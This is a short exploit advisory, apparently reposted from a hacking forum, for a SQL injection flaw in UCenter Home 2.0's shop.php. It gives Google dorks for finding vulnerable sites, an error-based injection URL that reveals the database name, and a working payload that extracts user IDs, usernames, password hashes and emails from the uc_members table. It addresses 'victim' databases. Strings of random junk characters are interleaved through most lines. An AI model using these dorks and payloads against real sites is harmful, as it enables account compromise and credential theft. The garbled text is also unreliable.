6 c- G, Z' \3 T( S' \( k0 t
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
1 x' A- R# a7 d1 S* G3 Z: d* Q( P9 {* a: r) A% n! l
$ m+ T: e" S g* |4 t. |8 {, r8 V8 d* U* L
*/ Author : KnocKout ' D* q v, }! K/ |1 w0 {) s( `
+ c, ?3 V6 \+ X& P: a*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
' E, a# C4 c' X
& k2 t9 C" g" F' y9 ~*/ Contact: knockoutr@msn.com
5 ?" z7 i1 M+ c- X" F4 C) l ~5 p+ L! j& ~# [2 K/ l* p+ P
*/ Cyber-Warrior.org/CWKnocKout % y8 M1 _7 v% m4 ]# d9 P$ r
1 n* j! Q3 k/ Y2 ]& \, z__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ L! a) H' Z/ I' @
! x0 t* B: W" R% MScript : UCenter Home
% I x+ s7 B& r; ^0 m# c7 I: I! o, ~# S6 h
Version : 2.0 ! X+ b7 h, A2 W y" {
* h3 U* l% `* ^ p" i
Script HomePage : http://u.discuz.net/ 1 {7 y8 t. Y$ I1 W/ q) |( `6 a
$ F/ m9 c6 ?5 U% g) A9 K8 o4 t; O
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== # z! V: r0 X3 @9 d7 H) @4 O
8 O: H/ ^8 E" W
Dork : Powered by UCenter inurl:shop.php?ac=view
6 w5 V: V6 I7 u% c" b) N: f. W9 ?4 S) i. J1 V$ g0 j! e- ^
Dork 2 : inurl:shop.php?ac=view&shopid=
' Y8 }, J' ~+ N3 G/ ^$ M0 O. d; o
5 }* q( |4 @6 Z/ `/ `__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
y$ ^. {" N5 E+ Z. ?/ ]! M A3 f9 d
Vuln file : Shop.php + `7 p8 p) ~5 t
9 t" x% [& M* } T+ |0 g. U$ I5 _value's : (?)ac=view&shopid=
' e6 y* x# U7 y; |4 v1 [
3 J( G: R9 H4 [- ~Vulnerable Style : SQL Injection (MySQL Error Based) 4 D- |; x( v. {9 Q# [' R0 G F
/ x. o( j! x! K. d M' W0 lNeed Metarials : Hex Conversion 8 \, h. B5 M+ ?( m6 O
4 k7 U' d, ^- X. u0 h/ \__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& _5 Z1 I1 R' \6 z, `+ v8 s/ ~6 ?9 y* }
Your Need victim Database name.
' |0 T0 x7 f8 n' X) a* U
$ P5 _6 u+ E0 C8 d; z! cfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 0 [' [7 G- d" w, i+ p* H: k. q
e. [' X0 r. F: |! S6 z: I. _
.. + X+ Y/ ^7 _( P/ J! l1 u# e/ Y
( ^0 P4 E' T" F. E8 ?- dDB : Okey. 8 Y2 ?9 o! @/ I+ O. o- M
, D3 K" w4 Y F, I% a
your edit DB `[TARGET DB NAME]` 0 A0 N# J" m( g+ `
5 q3 r6 n5 y9 x$ q1 W5 M' X4 z' {Example : 'hiwir1_ucenter' ! I t; x- }& z" u0 \: a& `
% Q, P) B, r9 \5 p, }Edit : Okey. 8 u# \/ b9 ?# [, |1 {$ z
2 }3 c. O) z/ Y1 B
Your use Hex conversion. And edit Your SQL Injection Exploit..
' H/ x5 l7 k0 d' {; {; D9 U: v: D/ r. b
4 {" {; l8 Y, h, H1 Y! g5 N. x' r# s3 T
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 0 {9 B* P" n: d; q5 s, ~1 Y0 d8 M0 \
|